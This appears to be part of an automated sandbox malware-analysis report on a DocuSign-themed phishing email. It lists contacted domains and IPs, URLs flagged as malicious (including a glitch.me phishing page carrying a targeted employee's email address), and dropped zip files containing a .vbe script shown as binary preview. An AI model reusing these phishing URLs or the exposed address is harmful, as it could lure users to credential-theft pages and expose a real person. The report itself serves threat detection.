            kit.fontawesome.com.cdn.cloudflare.net
            172.64.147.188
            truefalse
              high
              reformassegura.com
              86.109.170.84
              truefalse
                high
                antiphishing.vadesecure.com
                163.172.240.109
                truefalse
                  high
                  d26p066pn2w0s0.cloudfront.net
                  3.161.136.24
                  truefalse
                    high
                    www.cloudflare.com
                    104.16.123.96
                    truefalse
                      high
                      jbse.belgrin.com.au
                      110.173.134.108
                      truefalse
                        high
                        glitch-custom-domains.map.fastly.net
                        151.101.2.59
                        truefalse
                          high
                          xsapz.com
                          66.29.153.55
                          truefalse
                            high
                            www.google.com
                            142.251.15.99
                            truefalse
                              high
                              s-0005.dual-s-msedge.net
                              52.123.129.14
                              truefalse
                                high
                                aicreative.be
                                185.220.172.6
                                truefalse
                                  unknown
                                  dour-automatic-transport.glitch.me
                                  unknown
                                  unknowntrue
                                    unknown
                                    kit.fontawesome.com
                                    unknown
                                    unknownfalse
                                      high
                                      logo.clearbit.com
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        https://antiphishing.vadesecure.com/polyfills.2daf523d1a5fc162c0c2.jsfalse
                                          high
                                          https://jbse.belgrin.com.au/_a.html?send_id=eh&tvi2_RxT=www.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH&e=ZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZytrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://antiphishing.vadesecure.com/runtime.3847a57210e62cb7ac86.jsfalse
                                            high
                                            https://antiphishing.vadesecure.com/app/config/config.jsonfalse
                                              high
                                              https://antiphishing.vadesecure.com/4.efcb4f36899adf4857d1.jsfalse
                                                high
                                                https://aicreative.be/em/e.phpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://reformassegura.com/wp-includes/images/Docubg.jpgfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://jbse.belgrin.com.au/favicon.icofalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://xsapz.com/docu/me.phptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://reformassegura.com/wp-includes/images/banner.jpgfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://logo.clearbit.com/dailycer.frfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://antiphishing.vadesecure.com/images/logo-cloud.pngfalse
                                                  high
                                                  https://kit.fontawesome.com/f6136e9b49.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://antiphishing.vadesecure.com/favicon.icofalse
                                                    high
                                                    https://antiphishing.vadesecure.com/redirectfalse
                                                      high
                                                      https://antiphishing.vadesecure.com/styles.16be3c9519762a3240e8.cssfalse
                                                        high
                                                        https://antiphishing.vadesecure.com/images/load.svgfalse
                                                          high
                                                          https://antiphishing.vadesecure.com/translations/en.jsonfalse
                                                            high
                                                            https://dour-automatic-transport.glitch.me/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https:%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyfalse
                                                              unknown
                                                              https://logo.clearbit.com/inbox.comfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://antiphishing.vadesecure.com/main.3791483c41ff7549eac3.jsfalse
                                                                high
                                                                https://antiphishing.vadesecure.com/analysefalse
                                                                  high
                                                                  https://www.cloudflare.com/favicon.icofalse
                                                                    high
                                                                    https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frtrue
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      172.64.147.188
                                                                      kit.fontawesome.com.cdn.cloudflare.netUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      1.1.1.1
                                                                      unknownAustralia
                                                                      13335CLOUDFLARENETUSfalse
                                                                      163.172.240.109
                                                                      antiphishing.vadesecure.comUnited Kingdom
                                                                      12876OnlineSASFRfalse
                                                                      13.89.179.14
                                                                      unknownUnited States
                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                      142.250.105.95
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      64.233.176.84
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      173.194.219.102
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      151.101.2.59
                                                                      glitch-custom-domains.map.fastly.netUnited States
                                                                      54113FASTLYUSfalse
                                                                      52.123.129.14
                                                                      s-0005.dual-s-msedge.netUnited States
                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                      23.48.246.139
                                                                      unknownUnited States
                                                                      20940AKAMAI-ASN1EUfalse
                                                                      3.161.136.24
                                                                      d26p066pn2w0s0.cloudfront.netUnited States
                                                                      16509AMAZON-02USfalse
                                                                      173.194.219.84
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      66.29.153.55
                                                                      xsapz.comUnited States
                                                                      19538ADVANTAGECOMUSfalse
                                                                      108.177.122.139
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      142.251.15.99
                                                                      www.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      64.233.185.94
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      142.251.15.94
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      108.177.122.101
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      64.233.185.95
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      185.220.172.6
                                                                      aicreative.beNetherlands
                                                                      206281AS-ZXCSNLfalse
                                                                      110.173.134.108
                                                                      jbse.belgrin.com.auAustralia
                                                                      55803DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUfalse
                                                                      104.16.123.96
                                                                      www.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      86.109.170.84
                                                                      reformassegura.comSpain
                                                                      196713ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ESfalse
                                                                      IP
                                                                      192.168.2.16
                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1665452
                                                                      Start date and time:2025-04-15 15:03:29 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:18
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • EGA enabled
                                                                      Analysis Mode:stream
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Complete via DocuSign_ #Dailycer_Doc. Signature required 4_14_2025.eml
                                                                      Detection:MAL
                                                                      Classification:mal100.phis.evad.winEML@28/24@32/183
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .eml
                                                                      • Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 52.123.129.14
                                                                      • Excluded domains from analysis (whitelisted): ecs.office.com, dual-s-0005-office.config.skype.com, ecs.office.trafficmanager.net
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: jbse.belgrin.com.au
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):0
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:3CC9CFC37EF4BAB4253632572933ED9D
                                                                      SHA1:38F8735EF32109F5A5DF3F6385F38F4546AA32D7
                                                                      SHA-256:FE93FA689BFD86D88785A5DA9640068AF0B1100B4CF60BA7098F7F4E18A612DB
                                                                      SHA-512:DDAD659218EF4C793BC6370850A578E3DDE52B20B878F4B8C81F4A6A5705DE69346E2555E956F5B27FC334D39E5548A8566E576E70DDE0B2A8A51EBED1844F28
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:PK.........A.Z.H.R......f.....000180221100210.vbe..n3.v.......DM!..!..d..3.....n..X..#.6..,.#^.\.....Z.vWu..(=........b.T.]{.......j..........g...............h.b..5....}q.../.g.\........[.....?.O.................-[.K...s........|....e[.+...d...%=......3.hc..7.._U.....u.C..d.................?........c1..._....c.....]q.wv[\..../..Z..o../...].s[.......E[..u.../..'.]..h..w.y1......SqG.......).....T...............w../............Ot..E..M..+{.o...Q|.7..Y........w.h..6.[..(~.........K......F.8..)z0.O.U..?......s..%..o..x.h.........C..O...'.9.......9*.....?.#....X...|..*.:]...................S."..Y@..=.j.....U.I..,.....K...9..WE.....o.W....x...-.k.<...2.bD.d...U<.'..?....._...x0....w.U0jQ.o...;.cAi\......~.I1W.+x.<./E..(.........^s.....+8.[.vT<.....w.Mqua.w.V|S.=..e..?.../..}...)z...;.....^.......=.+...^.-...c].xU..Y...iV|...e........<|.*Zo..y.9.^..6+.......j....u}.7.o?}..v.....+.q_.=.cZ.....Sr..8)(.+fiU.oR.,+~..J..w...p..w..y,....C.n.{...-.}(Z
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):2019157
                                                                      Entropy (8bit):7.777033986770644
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:3CC9CFC37EF4BAB4253632572933ED9D
                                                                      SHA1:38F8735EF32109F5A5DF3F6385F38F4546AA32D7
                                                                      SHA-256:FE93FA689BFD86D88785A5DA9640068AF0B1100B4CF60BA7098F7F4E18A612DB
                                                                      SHA-512:DDAD659218EF4C793BC6370850A578E3DDE52B20B878F4B8C81F4A6A5705DE69346E2555E956F5B27FC334D39E5548A8566E576E70DDE0B2A8A51EBED1844F28
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      Preview:PK.........A.Z.H.R......f.....000180221100210.vbe..n3.v.......DM!..!..d..3.....n..X..#.6..,.#^.\.....Z.vWu..(=........b.T.]{.......j..........g...............h.b..5....}q.../.g.\........[.....?.O.................-[.K...s........|....e[.+...d...%=......3.hc..7.._U.....u.C..d.................?........c1..._....c.....]q.wv[\..../..Z..o../...].s[.......E[..u.../..'.]..h..w.y1......SqG.......).....T...............w../............Ot..E..M..+{.o...Q|.7..Y........w.h..6.[..(~.........K......F.8..)z0.O.U..?......s..%..o..x.h.........C..O...'.9.......9*.....?.#....X...|..*.:]...................S."..Y@..=.j.....U.I..,.....K...9..WE.....o.W....x...-.k.<...2.bD.d...U<.'..?....._...x0....w.U0jQ.o...;.cAi\......~.I1W.+x.<./E..(.........^s.....+8.[.vT<.....w.Mqua.w.V|S.=..e..?.../..}...)z...;.....^.......=.+...^.-...c].xU..Y...iV|...e........<|.*Zo..y.9.^..6+.......j....u}.7.o?}..v.....+.q_.=.cZ.....Sr..8)(.+fiU.oR.,+~..J..w...p..w..y,....C.n.{...-.}(Z